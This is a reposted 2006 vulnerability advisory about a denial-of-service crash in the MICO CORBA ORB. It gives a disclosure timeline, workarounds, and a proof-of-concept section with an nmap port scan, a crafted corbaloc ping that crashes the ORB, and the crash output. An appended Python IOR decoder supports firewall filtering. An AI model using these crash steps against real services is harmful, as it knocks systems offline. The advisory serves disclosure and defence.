Mico crashes when contacted with wrong IOR / DoS

CVE: (none listed)
Category: CWE-Other
Price: Not specified
Severity: Not specified
Author: Unknown
Risk: Not specified
Exploitation Type: Not specified
Date: 2006-07-14
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070061

Below is a copy:

== == == TOC == == ==

1. Affected Vendor
2. Affected Product
3. Vulnerability
4. Safety Hazard
5. Disclosure Timeline
6. Vendor Response
7. Patch / Workaround
8. Vulnerability Details

---------------------

== 1. Affected Vendor ==
    Object Security

== 2. Affected Products ==
    MICO (Mico Is CORBA), an open-source ORB
    Tested on versions:
        2.3.12RC3
        2.3.12
        and latest from repository
    More info: http://www.mico.org

== 3. Vulnerability ==
    MICO crashes when contacted with a wrong object key (the orb-id or
    orb-creation-time part).

== 4. Safety Hazard ==
    critical, potential Denial-of-Service

== 5. Disclosure Timeline ==
    2006-06-27 Problem found and analysed / tested with other versions
    2006-06-29 Vulnerability reported to vendor and MICO's
                 devel mailing list
    2006-07-05 2nd mail to vendor and mailing-list
    2006-07-06 Full disclosure

== 6. Vendor Response ==
    None.

== 7. Patch / Workaround ==
    No patch available yet.

    Possible workarounds:
    a) Don't use MICO in or over public networks
    b) Protect MICO with an (IIOP) firewall

== 8. Vulnerability Details ==
    The following is for educational purposes only!

    Start the ORB you'll crash. Example code:
    -> http://wwwstud.informatik.uni-rostock.de/~cb098/mico_bug.tgz
        $ ./server
    Scan your target...
        $ sudo nmap -sS -oM results.nmap -p 1-65535 192.168.1.10 \
            | grep unknown
        8010/tcp  open  unknown
        49576/tcp open  unknown
        51140/tcp open  unknown

    One of these ports could be the ORB. Let's try to ping
    (object._non_exists()) the last one. For this I'm using a special
    handmade CORBA-Ping-Prog. It's also possible to use JacORB's pingo.
    My JPing is available at
        http://wwwstud.informatik.uni-rostock.de/~cb098/JPing.java
        $ java JPing -p corbaloc::192.168.1.10:8010//200/1151845678/0/_5
      orb.string_to_object             ... ok
      object exists? Exception caught; org.omg.CORBA.COMM_FAILURE:
      vmcid: SUN  minor code: 208 completed: Maybe

    The lines above indicate that something went wrong. On
    every active port you'll get COMM_FAILURE, but on the ORB port
    OBJECT_NOT_EXIST is expected and mandated by the OMG CORBA spec.
    (See http://www.omg.org)

    -- mico testserver crashed / output --
    A look at the server terminal shows that something is wrong.

$ ./server
    IOR:010000000e00000049444c3a48656c6c6f3a312e300000000200000000000000390
    0000001010000160000006c6f63616c686f73 742e6c6f63616c646f6d61696e00c4c71
    50000002f363836302f313135313735303432362f302f5f300000000100000024000000
    0100 000001000000010000001400000001000000010001000000000009010100000000
    00 # myior <-- everything is ok until here
    server: orb.cc:332: void CORBA::ORBInvokeRec::set_answer_invoke(CORBA::
    InvokeStatus, CORBA::Object*, CORBA:: ORBRequest*, GIOP::AddressingDisp
    osition): Assertion `_type == RequestInvoke' failed.
    Aborted
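
As an added example (not part of the original advisory or of MICO), the following Python decodes the stringified IOR printed by ./server above and reports which leading object-key fields a requested key gets wrong, which is the comparison an IIOP filter from workaround (b) could apply before forwarding a request. The key layout /orb-id/orb-creation-time/... is an assumption inferred from the advisory's wording, and the names CDR, decode_ior and key_mismatch are hypothetical.

```python
import struct

# IOR printed by ./server in the advisory, with the line-wrap spaces removed.
PAGE_IOR = ("IOR:"
    "010000000e00000049444c3a48656c6c6f3a312e300000000200000000000000"
    "3900000001010000160000006c6f63616c686f73742e6c6f63616c646f6d6169"
    "6e00c4c7150000002f363836302f313135313735303432362f302f5f30000000"
    "0100000024000000010000000100000001000000140000000100000001000100"
    "000000000901010000000000")

class CDR:
    """Minimal CDR reader; offsets count from the start of the encapsulation."""
    def __init__(self, data):
        self.d, self.p = data, 1
        self.e = "<" if data[0] else ">"       # first octet: 1 = little endian
    def num(self, fmt, size):
        self.p += -self.p % size               # align to the type's natural boundary
        (v,) = struct.unpack_from(self.e + fmt, self.d, self.p)
        self.p += size
        return v
    def octets(self):                          # sequence<octet>, also used for strings
        n = self.num("I", 4)
        if self.p + n > len(self.d):
            raise ValueError("length field runs past the buffer")
        self.p += n
        return self.d[self.p - n:self.p]

def decode_ior(ior):
    """Return (type_id, host, port, object_key) of the first IIOP profile."""
    if not ior.startswith("IOR:"):
        raise ValueError("not a stringified IOR")
    top = CDR(bytes.fromhex(ior[4:]))
    type_id = top.octets().rstrip(b"\0").decode("latin-1")
    for _ in range(top.num("I", 4)):           # sequence of tagged profiles
        tag, body = top.num("I", 4), top.octets()
        if tag == 0:                           # TAG_INTERNET_IOP
            prof = CDR(body)
            prof.p += 2                        # skip IIOP version (major, minor)
            host = prof.octets().rstrip(b"\0").decode("latin-1")
            port = prof.num("H", 2)
            return type_id, host, port, prof.octets().decode("latin-1")
    raise ValueError("no IIOP profile in IOR")

def key_mismatch(published, requested):
    """List the leading key fields in which a request differs from the IOR."""
    names = ("orb-id", "orb-creation-time")    # assumed meaning of fields 1 and 2
    pub = (published.split("/") + ["", ""])[1:3]
    req = (requested.split("/") + ["", ""])[1:3]
    return [n for n, a, b in zip(names, pub, req) if a != b]
```

An empty list from key_mismatch means the request addresses the running ORB instance; any other result names the field a filter would reject on.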
